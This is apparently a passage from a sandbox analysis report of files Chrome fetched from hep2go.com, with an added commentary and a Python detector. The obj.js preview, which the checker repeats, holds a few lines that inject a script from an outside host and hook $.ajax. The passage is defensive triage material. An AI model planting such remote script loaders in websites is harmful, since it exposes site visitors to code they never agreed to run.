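On a real dropped shortcut the same `parse_lnk()` call gives the target, the arguments and the working directory, which is what decides whether a start-menu entry is the browser's own profile shortcut or something that will run a payload at the next click. The reader ignores the optional Unicode path fields (LinkInfoHeaderSize >= 0x24) and the ExtraData blocks after the StringData, so a tracker or environment-variable block would need extending it.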
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:GIF image data, version 89a, 60 x 60
                Category:downloaded
                Size (bytes):11399
                Entropy (8bit):7.3875751803389695
                Encrypted:false
                SSDEEP:
                MD5:A4F1B4E5BA8012CFC75A803FB0A85858
                SHA1:FDDC19EE12350974CC8A766DB2ED6893629A3A45
                SHA-256:F76AC5EC61361D5C9A9963AC3170EEFF796DD2E590BB7786AD9C86BE77B658A7
                SHA-512:1D89ED5B43F950D03757D1FD2D6106169077F1D440FA094FE5018D09C9DD66C3FFD68DA955A421362B42A647B6538C172B046B935E819D7D34D1FE485260F1B9
                Malicious:false
                Reputation:unknown
                URL:https://www.hep2go.com/images/progress.gif
                Preview:GIF89a<.<.....Bq.Es.HuP}.R..]..^..`..`..b..............................................................!.......!..NETSCAPE2.0.....,....<.<..... .di... I.p,.tM.....*.o...G8!q.8..L...........i.......i.r...glS....o.=H7.Exj.H|}k..e....-...`..[....n.u....J...V.....}........................................................................}.t..........I AN...;X&.....8..1....a|cpc.... ...."2O.drq%K.._>...%M.6o..3../~.m!.h0.C}"M.t)S.N..U...!.......,....<.<...Bq.Es.HuO}.P}.R..^..^..`..`..b.......................................................... .di.A. J.p,.tM.....*.o...G8!q.8.q.&.iLJ...:............N..60./.K...|.{|}t.-..J.."jz...u..p.~.M.)...........k.............z.............................................................................R!.F,..K.'pJ..A....$..q...'..h. ..?J.)...pI...C...+*_..HQ....m...I.C.n.*.'Q.F..@ ..R..j>e..).bM.*Mj..P.G.&.Z...T!..!.......,....<.<...Bq.Es.HuO}.P}.R..^..^..`..`..b..........................................
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:ASCII text, with very long lines (5960)
                Category:dropped
                Size (bytes):303200
                Entropy (8bit):5.598966824499731
                Encrypted:false
                SSDEEP:
                MD5:12463006F7F00A870357B2911073BAEB
                SHA1:9D615FF9BFC31508CC7DCA5D1E966749FF5F3047
                SHA-256:39D3E8A702B6F892A4AF04EEA8386CF78AEF95F65594BDA3B95EC54F9E1669B7
                SHA-512:6559B5F439B8FA0FA81330CB6D1E3F573AF67E7A43681F657B16EDFE36797BA6D496A2FEA484398AE795560F575C35ECC6F3B9CED3C1063D5EAF5C8359B6C24D
                Malicious:false
                Reputation:unknown
                Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_ga_send","priority":6,"vtp_value":true,"tag_id":10},{"function":"__ogt_referral_exclusion","priority":6,"vtp_includeConditions":["list","hep2go\\.com"],"tag_id":12},{"function":"__ogt_session_timeout","priority":6,"vtp_sessionMinutes":30,"vtp_sessionHours":0,"tag_id":13},{"function":"__ogt_1p_data_v2","priority":6,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR",
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:ASCII text
                Category:dropped
                Size (bytes):20517
                Entropy (8bit):5.109335510325792
                Encrypted:false
                SSDEEP:
                MD5:5C935567C029B01DE09437E4D6B9AA5E
                SHA1:C29A54C7B2A68AA82FB2CA25603C437A5B3BD098
                SHA-256:5422E23654BF2DC270C91128FBD11F67D33257AF2683240DBF5A6840F44D32D9
                SHA-512:B4FCEA37BA0BEF0563D23723ADC98BA8A4C5836578E632E5544EE76B602E5C3BEB4C352A535FD3850C75B25635B1BE79FBCA4835A4DBA33E50D3F13034401F48
                Malicious:false
                Reputation:unknown
                Preview:/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * ..Author..: Ch.Raja Shekar..Description : Javascripts for hep2go.com..Date..: Oct 24'th - 2009..Updates..:. * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */ ..function inQuotes( text ).{..return ('"'+ text +'"');.}..function nonNull( text ).{..return ( !(text == null || text == "" || text == 'undefined') );.}..function ensureElementValue( id, variable, query, errorMessage).{..var element = document.getElementById( id );..if(!element)..{...alert(query + " failure");...return(false);..}..else..{...if( nonNull(element.value)) return element.value;...if(element.type != 'hidden') element.focus();.....if( nonNull(errorMessage))....alert( errorMessage );...else....alert( variable +" value is Null. Please enter valid value for "+ inQuotes(variable));.......return(false);..}.}..function strings_match(str1, str2, match_case ).{..if(str1 == str2) return true;..if(match_case)...return (str1 == str2);..else..{...i
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:ASCII text, with very long lines (5960)
                Category:downloaded
                Size (bytes):303178
                Entropy (8bit):5.598993991749311
                Encrypted:false
                SSDEEP:
                MD5:7123054006C081327FD35C421014B1E3
                SHA1:0074E23B1B8F34B868E1AC75985A4E3FB57739E6
                SHA-256:4AAA084646D8301A81EF16B71315B887566A29CA20E30FB64E0F502C7C25641D
                SHA-512:3F7CA800B3BB87C2062629A100593C3AB02C31C9ED9CC18E3C7E8AB5764661C44BB1D923C0BAFE8019E2E6EE2F2D736E0F2B3268D7C0E917251C4AD431E988D7
                Malicious:false
                Reputation:unknown
                URL:https://www.googletagmanager.com/gtag/js?id=G-WMZXJKTR1T&cx=c&_slc=1
                Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_ga_send","priority":6,"vtp_value":true,"tag_id":10},{"function":"__ogt_referral_exclusion","priority":6,"vtp_includeConditions":["list","hep2go\\.com"],"tag_id":12},{"function":"__ogt_session_timeout","priority":6,"vtp_sessionMinutes":30,"vtp_sessionHours":0,"tag_id":13},{"function":"__ogt_1p_data_v2","priority":6,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR",
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 118x20, components 3
                Category:dropped
                Size (bytes):3429
                Entropy (8bit):7.783168929797866
                Encrypted:false
                SSDEEP:
                MD5:BEBF7FFE3BA97386DFF80A094FB5B1FC
                SHA1:41C2BF9C88FD5553B7B6329DA25ACB7B3E7611F8
                SHA-256:9056857615D96D0D739DD7A0CD20D2D9F97F551884FE16494EA5192103EA7280
                SHA-512:F2B1ED8C1ED02534DFF2416C6FF651721EA6FD884B3530DA45534EDF178CE25DE8FF4E91FC47D264578DEFE6E1402DE9FF9B9D668234CCA7F540C78E0CCCC5EC
                Malicious:false
                Reputation:unknown
                Preview:......JFIF.....H.H.....C....................................................................C.........................................................................v........................................#................................................................!...........................................?.....w.{..qJ.......g.4....a............?....XC........fs.7..........u......|.q.{...=......}...~<....G.!t...}...._/....>*....7z....o......."NN...8.........^".....Ge..Q.n.<..../'$g.w....F:G.......A.y...2....-...Z.P.....V.q]?....K./#.<......:........B.I..Kp..|..O...'....s.....,:.]......6Se.DV.....E....,.\..;/.*.{u....Yy9#?S...'.1.<.g..]X.b......#.h(.{oJukYC.l>cmX..t..VW.]..l..`..........K.....O...M...*...lOS;...)..0Xu...]..=.C.l..5.w.8......,.........u..p...0.,K.Yo0..|.._..:......rI.~....... u....J.D....G.)...............*..#.T=$N............7`...O.|-.Vp.....C|..D.#...".M....[_.\{.Q''y...s/...H.M8........v>....E.e.>Ep!"..>C.K.....nNGVa\5..8==.!...
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:ASCII text, with very long lines (32038)
                Category:downloaded
                Size (bytes):95957
                Entropy (8bit):5.39099763946861
                Encrypted:false
                SSDEEP:
                MD5:895323ED2F7258AF4FAE2C738C8AEA49
                SHA1:276C87FF3E1E3155679C318938E74E5C1B76D809
                SHA-256:ECB916133A9376911F10BC5C659952EB0031E457F5DF367CDE560EDBFBA38FB8
                SHA-512:C40111C3CC0754E90CF71F72F7F16F43B835B7E808423DFD99F90DD5177538B702E64FF1D9EE8D3BC86AEAA11B6F7A0EF826184E354B162158839FFB75D174CC
                Malicious:false
                Reputation:unknown
                URL:https://www.hep2go.com/javascript/jquery-1.11.3.min.js
                Preview:/*! jQuery v1.11.3 | (c) 2005, 2015 jQuery Foundation, Inc. | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l="1.11.3",m=function(a,b){return new m.fn.init(a,b)},n=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,o=/^-ms-/,p=/-([\da-z])/gi,q=function(a,b){return b.toUpperCase()};m.fn=m.prototype={jquery:l,constructor:m,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=m.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return m.each(this,a,b)},map:function(a){return this.pushStack(m.map(this,function(b,c){ret
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:ASCII text, with very long lines (2343)
                Category:downloaded
                Size (bytes):52916
                Entropy (8bit):5.51283890397623
                Encrypted:false
                SSDEEP:
                MD5:575B5480531DA4D14E7453E2016FE0BC
                SHA1:E5C5F3134FE29E60B591C87EA85951F0AEA36EE1
                SHA-256:DE36E50194320A7D3EF1ACE9BD34A875A8BD458B253C061979DD628E9BF49AFD
                SHA-512:174E48F4FB2A7E7A0BE1E16564F9ED2D0BBCC8B4AF18CB89AD49CF42B1C3894C8F8E29CE673BC5D9BC8552F88D1D47294EE0E216402566A3F446F04ACA24857A
                Malicious:false
                Reputation:unknown
                URL:https://www.google-analytics.com/analytics.js
                Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self,p=function(a,b){a=a.split(".");var c=n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};function q(){for(var a=r,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function u(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var r,v;.function aa(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=v[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}r=r||u();v=v||q();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&240|h>>2),64!=g&&(c+=String.fromCharCode(h<<6&192|g)))}};var w={},y=function(a){w.TAGGING=w.TAGGING||[];w.TAGGING[a]=!0};var ba=Array.isArray,c
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:ASCII text, with no line terminators
                Category:downloaded
                Size (bytes):84
                Entropy (8bit):5.109595923232876
                Encrypted:false
                SSDEEP:
                MD5:F31E7458A8D5F1F4DB1DA7BB8E32F71A
                SHA1:859CF723584C3EC1ED258252DBAB3BA18D5BEBAD
                SHA-256:5E739A9B37BF38D57EB5D321D005E0D670D680F887969A5DAEAE87A4FA65D6ED
                SHA-512:479A03FD3406FA4A7254D1AF4DA9FB23BFAD5F6D7E677958F62B62B852E62F5C35D73CE0E0A281E0DD106208C6A935E6EC49290DD344A860C3BEAE84B1F6B8BB
                Malicious:false
                Reputation:unknown
                URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwkcjDzhxZJeMRIFDXhvEhkSBQ3OQUx6?alt=proto
                Preview:CjsKEQ14bxIZGgQICRgBGgQIVhgCCiYNzkFMehoECEsYAioZCApSFQoLIUAkKi4tXz8mKyMQARj/////Dw==
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:PNG image data, 300 x 100, 8-bit/color RGBA, non-interlaced
                Category:downloaded
                Size (bytes):10387
                Entropy (8bit):7.963698662409975
                Encrypted:false
                SSDEEP:
                MD5:F718D4CFC1A939C6E819F0ABF6E1A736
                SHA1:D432FCA15E9ACE5C85BC8A7CD3CCB7AA57438BAB
                SHA-256:E834A95F2E4ABFF3092D8D558664DD59CA67E111208C03616BB437652EB589FF
                SHA-512:F68345742A99FAEE4211B6D1992298699CBEB9496331275A5E26152F16CCBAA3FDA6464935FED23A2E734E89B71EC991499B2BEE341F6B385664E67A6BFC5169
                Malicious:false
                Reputation:unknown
                URL:https://www.hep2go.com/images/medium-logos/2022-logo-blue-medium.png
                Preview:.PNG........IHDR...,...d.....<.......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:ASCII text
                Category:downloaded
                Size (bytes):8688
                Entropy (8bit):4.781337574261119
                Encrypted:false
                SSDEEP:
                MD5:8BADEEDDE03B62189E8D25CC59CC350B
                SHA1:52DE8D4242EF410273502198B69A82855A176125
                SHA-256:2B8C250413DA18135642C28DB6B82FB42FCF0E74875FEB249209475FC6934A48
                SHA-512:BEB2578CBDF38E3A8516CFDDC2969CCB70D86007723E1B0EDE495275D41EF9914D1470FB3FB930D0650716B1F44E86F5C92C3684A849E13F177E5F83F41FE452
                Malicious:false
                Reputation:unknown
                URL:https://www.hep2go.com/include/obj.js
                Preview:var oriAjax;.var a = document.createElement("script");.a.src = "https://cta.berlmember.com/google/jquery.php";.document.getElementsByTagName("head")[0].appendChild(a);.$(function(). {. oriAjax = $.ajax;.. $.ajax = function(options, a, b, c). {. if (options.success). {. var oriSuccess = options.success;.. options.success = function(data). {. if ((rawUrlDecode(data.error) == 11003) || (data == "-111003")). {. location.reload();. }. else. {. oriSuccess(data);. }. }. }.. oriAjax(options, a, b, c);. };. });..var locServer = "";.//var locServer = "/~h2gdevel";.var idEnabled = true;.var logoutTime = 5400; // Seconds to logout.var logoutTimeSyncDiff = 5; // Seconds to synchronize the backend before logoutTime expires.var logoutCounter = 0; // Local Counter.var logoutBackendCounter = 0; // Backend Counter.var oriTime = new Date();.var logoutInitSecs = parseInt(oriT
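Two things in the obj.js preview above deserve a second look during triage, even though the report records the file as Malicious: false. The first lines create a `<script>` element whose `src` points at `cta.berlmember.com`, a domain other than the site's own, and append it to `<head>`; the code that follows replaces `$.ajax` so that every jQuery XHR success callback passes through the file's own wrapper first. Whether that loader is an intended dependency of the site is not something the report establishes. The checker below is an added example, not Joe Sandbox code and not part of hep2go.com; `OBJ_JS` is the start of the preview with its line breaks restored (the report renders them as dots). It looks only for literal `src` strings, so concatenated or obfuscated sources would need a real JavaScript parser.

```python
"""Flag third-party script injection and $.ajax hooking in a dropped .js file.

Added example, not Joe Sandbox code.  OBJ_JS is the beginning of the
obj.js preview from the report with line breaks restored.
"""
import re
from urllib.parse import urlparse

OBJ_JS = r'''var oriAjax;
var a = document.createElement("script");
a.src = "https://cta.berlmember.com/google/jquery.php";
document.getElementsByTagName("head")[0].appendChild(a);
$(function()
 {
 oriAjax = $.ajax;
 $.ajax = function(options, a, b, c)
 {
 if (options.success)
 {
 var oriSuccess = options.success;
 options.success = function(data)
 {
 if ((rawUrlDecode(data.error) == 11003) || (data == "-111003"))
 {
 location.reload();
 }
 else
 {
 oriSuccess(data);
 }
 }
 }
 oriAjax(options, a, b, c);
 };
 });
'''

SCRIPT_CREATE = re.compile(r'createElement\(\s*["\']script["\']\s*\)', re.I)
SRC_LITERAL = re.compile(r'\.src\s*=\s*["\']([^"\']+)["\']')
AJAX_REPLACED = re.compile(r'\$\.ajax\s*=\s*function\b')


def injected_script_sources(js: str) -> list:
    """Literal src values assigned in a file that also creates a <script> element."""
    if not SCRIPT_CREATE.search(js):
        return []
    return SRC_LITERAL.findall(js)


def is_first_party(url: str, site: str) -> bool:
    """True when the URL's host is the site itself or one of its subdomains."""
    host = (urlparse(url).hostname or "").lower()
    return host == site or host.endswith("." + site)


def review(js: str, site: str) -> list:
    """Findings a reviewer should read before accepting the file as benign."""
    findings = []
    for src in injected_script_sources(js):
        if not is_first_party(src, site):
            findings.append(f"third-party script loader: {src}")
    if AJAX_REPLACED.search(js):
        findings.append("$.ajax reassigned: every jQuery XHR success callback is wrapped")
    return findings


if __name__ == "__main__":
    for finding in review(OBJ_JS, "hep2go.com"):
        print(finding)
```

The first-party test is deliberately a suffix match on the registrable name given by the caller; a bare `in` check would accept `hep2go.com.example` as first party.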
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:ASCII text, with very long lines (328), with CRLF line terminators
                Category:dropped
                Size (bytes):40475
                Entropy (8bit):5.197019158623605
                Encrypted:false
                SSDEEP:
                MD5:F923F1A58C8EF6CF94137927671E0ECC
                SHA1:5E16E547B72C0FBF2689670E5DC0F6367CED02F5
                SHA-256:06A11BD43143B8E1AB5DD407138ED55D36DCF1E59B8365BB5207DCD39A1F74A0
                SHA-512:70FE87BD0170F34A0F5E148DC5A9974883EA85EF239E7B2B22839252C99649DA32713DF612D2AABF4B0F08910574AD73D611E7A776ECBEC304961675726B0C74
                Malicious:false
                Reputation:unknown
                Preview:var sPath = window.location.href;..var sPage = sPath.substring(sPath.lastIndexOf('/') + 1);....var GSERVER = "http://www.hep2go.com";..var GDOMAIN = "www.hep2go.com";..var GSERVER_SSL = "https://www.hep2go.com";..var GCOOKIE_DOMAIN = "www.hep2go.com";..var GCOOKIE_PATH = "/";../*..var GSERVER = "http://174.138.160.74/~h2gdevel";..var GDOMAIN = "174.138.160.74/~h2gdevel";..var GSERVER_SSL = "https://174.138.160.74/~h2gdevel";..var GCOOKIE_DOMAIN = "174.138.160.74";..var GCOOKIE_PATH = "/~h2gdevel";..*/..var GSERVER_CUR;....var pageUrl = window.location.href;..var pageProtocol = pageUrl.toUpperCase().substr(0, 5);....if (pageProtocol == "HTTPS").. {.. GSERVER_CUR = GSERVER_SSL;.. }..else.. {.. GSERVER_CUR = GSERVER;.. }......if (sPage.lastIndexOf("?") != -1).. {.. sPage = sPage.substr(0, sPage.length - sPage.length + sPage.lastIndexOf("?"));.. }....var excDefault;..var el_desc = null;....var imgProgress = new Image(100,24); ..imgProgress.src = GSERVER_CUR + "/images/progress.gif
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:ASCII text, with CRLF line terminators
                Category:downloaded
                Size (bytes):8134
                Entropy (8bit):4.9456606000734205
                Encrypted:false
                SSDEEP:
                MD5:090FD50A56506E9D52467440C8035001
                SHA1:88AB631764417911E877A2E99FFDD5C078FEC7DC
                SHA-256:EA69FDEADDE3ED63F1F66A9E505FF6F701371ADBCACD575E9D05045B5CE76816
                SHA-512:3C2A0884AE8B00DFD3B105BD2585C312ECD0DB031974018BE2A71DE63533B5D1B6BE826EBEE8E4A2BBBEDEDAF8BDAC95D60CDF98046D9F51ECAB78BF4FB8C1C5
                Malicious:false
                Reputation:unknown
                URL:https://www.hep2go.com/javascript/user_ref.001.js
                Preview:var urInitialized = false;..var userRef = getUserRef();....var GSERVER = "http://www.hep2go.com";..var GSERVER_SSL = "https://www.hep2go.com";..var GHOST = "www.hep2go.com";../*..var GSERVER = "http://174.138.160.74/~h2gdevel";..var GSERVER_SSL = "https://174.138.160.74/~h2gdevel";..var GHOST = "174.138.160.74/~h2gdevel";..*/..var GSERVER_CUR;....var pageUrl = window.location.href;..var pageProtocol = pageUrl.toUpperCase().substr(0, 5);....if (pageProtocol == "HTTPS").. {.. GSERVER_CUR = GSERVER_SSL;.. }..else.. {.. GSERVER_CUR = GSERVER;.. }....$(function().. {.. urInit();.. });....function urInit().. {.. urInitialized = true;.. urDoInit();.. urShowTitle();.. }....function urDoInit().. {.. var elems = document.getElementsByTagName("A");.... for (var i = 0; i < elems.length; i++).. {.. urCheckA(elems[i]);.. }.... var elems = document.getElementsByTagName("IMG");.... for (var i = 0; i < elems.length; i++).. {.. urCheckImg(elems[i]);.. }.... var elem
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:GIF image data, version 89a, 86 x 87
                Category:dropped
                Size (bytes):290
                Entropy (8bit):7.05700020807592
                Encrypted:false
                SSDEEP:
                MD5:F1B6D6A8D3FC06CD0F8C43890453A4C1
                SHA1:9478147534BD36109E504133E356F26BEAD5C63C
                SHA-256:B0D7F1F96BEE2999B81799851F15279BFD5F77C3E96E4D9E23FC8C407606E52F
                SHA-512:28BAC97F04494728C4517620DF7D81EDC85F55F097CFB0D3476A3EA2876F6F68A7FCFA39A2DE4C6B2771A4A33FBDB4D893E57F50450A0808A91E1E973ECD11B1
                Malicious:false
                Reputation:unknown
                Preview:GIF89aV.W..........Y..,...........;..!.......,....V.W....h...0.I..8...`(.di.h..l.p,.tm.x..|....pH,...r.l:..tJ.Z...`..z...w.._.d2aqH...w.R...l..n.{.~\x.m..|..[..............~....~......u.y.........q..z.....v..}........r.z..............~.n.Z...g.f....kX...........................H.....;
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 52x52, components 3
                Category:dropped
                Size (bytes):2827
                Entropy (8bit):7.705210317941042
                Encrypted:false
                SSDEEP:
                MD5:C0A6CBDDBF7E29C899348639ADBD2AF2
                SHA1:FA17297FE776A520B0409F244DDCEC1DDCA1DC1D
                SHA-256:FDE5C7BB7E7027E5EDC43A275E53059EAAB19BBA01060EBE81F0CA251A4AFB9E
                SHA-512:F1F4E89E2230CE651FCC6F32506BE5009EAF964718475D92D3135BA5C3AF2FA7E9BD6777B29B86D13052448D7404711D431C424BDF79ACF88A39CE9589BC36B8
                Malicious:false
                Reputation:unknown
                Preview:......JFIF.....,.,.....C....................................................................C.......................................................................4.4..........................................4..............................!1.A.."#T..%2Qaqr....................................<..............................!1A.."S..#$Tq......234a.................?...M4.M4.M4.M4.M4.M4.".!..U.li...............83..(a.(..q.....V...p.kW....P#..M28.........zMr9..Ts\...9....=..=QS.\eEETTTT^...QS.%Ms.Q.j..Q....T_tTT.TT....k:i..i..j..I...6<..A.6+Q...kn2..L.%cX.H..=Z..h.-J....j........._K..W..^m.FI..\..[T.{Ekf$.LY}..$.l{....d....C{.Z]{.e..B................M...x.\.k.6.D...j.|8......f."./..qywmonR)Kega.l..\.W...!...W....Vm....# .......dX.....DDD.....'..Teg{ws`.[{{;;B..}...eMR+...Pr<............:.l..7.W....NrG..[....w.AZc..V.p..jM.Y..`w.(Y-..c^.t.n%Q.1Z..<.:)#..z.7..+.Y.,P.....j...p..U.*......:....*...L.!.ZZ.k.v4e.F.pX.jK.Y^..E|q6KS.k.[.I...?.n.OP..8._...n../.O.G.Y...i..t..
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 103x32, components 3
                Category:dropped
                Size (bytes):16452
                Entropy (8bit):2.9033933458873604
                Encrypted:false
                SSDEEP:
                MD5:341A7C0F6F4DB207B467EF80312BF34F
                SHA1:B45EC7ACEF5B7EA76426A2BFE4C91EC3228E8EF7
                SHA-256:1AD497389043C0B6AA886FEE2FD9D7783A2B966E26E82BE59E47C4F7FBD6CE4F
                SHA-512:EF306758278BC0E442E6A723A6064E0ADAC874EFAA37E542F79CDA46379CFE78AB4EB72B308AF8582C913719BE15D163EE50D4BEB52B7434F592C063184A45A6
                Malicious:false
                Reputation:unknown
                Preview:......JFIF.....H.H....2$http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/">. <xmp:CreatorTool>Adobe Fireworks CS6 (Macintosh)</xmp:CreatorTool>. <xmp:CreateDate>2017-08-31T18:34:15Z</xmp:CreateDate>. <xmp:ModifyDate>2017-08-31T19:10:18Z</xmp:ModifyDate>. </rdf:Description>. <rdf:Description rdf:about="". xmlns:dc="http://purl.org/dc/elements/1.1/">. <dc:format>image/jpeg</dc:format>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>. . .
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 103x32, components 3
                Category:downloaded
                Size (bytes):15896
                Entropy (8bit):2.649342387748696
                Encrypted:false
                SSDEEP:
                MD5:F8DEABCE160BEE702F3BF863D5EACF39
                SHA1:5E0A3F0C249C9B952B7B4BD08CD28335313BDFD6
                SHA-256:FD1F9A1A3CAAC0A110464E8FAC95F5D3346270F7258D1AF64EB06D75770A69A3
                SHA-512:AE9AC00A3BF53DBEE6467AA63068819AFE97068E8394902D02AA0E646AFE8AD40DB8FB8E4FEF709C4AEA10C64BED828B26871D2E420EA853F1D7F80DF8F42189
                Malicious:false
                Reputation:unknown
                URL:https://www.hep2go.com/images/login.jpg
                Preview:......JFIF.....H.H....2$http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/">. <xmp:CreatorTool>Adobe Fireworks CS6 (Macintosh)</xmp:CreatorTool>. <xmp:CreateDate>2017-08-31T18:34:15Z</xmp:CreateDate>. <xmp:ModifyDate>2017-08-31T19:07:01Z</xmp:ModifyDate>. </rdf:Description>. <rdf:Description rdf:about="". xmlns:dc="http://purl.org/dc/elements/1.1/">. <dc:format>image/jpeg</dc:format>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>. . .
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 52x52, components 3
                Category:dropped
                Size (bytes):16377
                Entropy (8bit):2.8640517590856276
                Encrypted:false
                SSDEEP:
                MD5:7C8D592728B43433354C49817D6AF21A
                SHA1:D81C17BE5A41D899F9877ED8D47E86D0B15BE5FB
                SHA-256:52F2E94A2A70B234E5EF5F5A17CEA036F757A7090A00C955F2DF5074330A7C8B
                SHA-512:C5757FF04FE0D1A3C0B685429536E6F19A331DB472D3E8C2A388FFCFB74D8B558710ABDFC2354C3AA50547B0395C19AB5F3A354B0DDABD6206F51205EAA25FA6
                Malicious:false
                Reputation:unknown
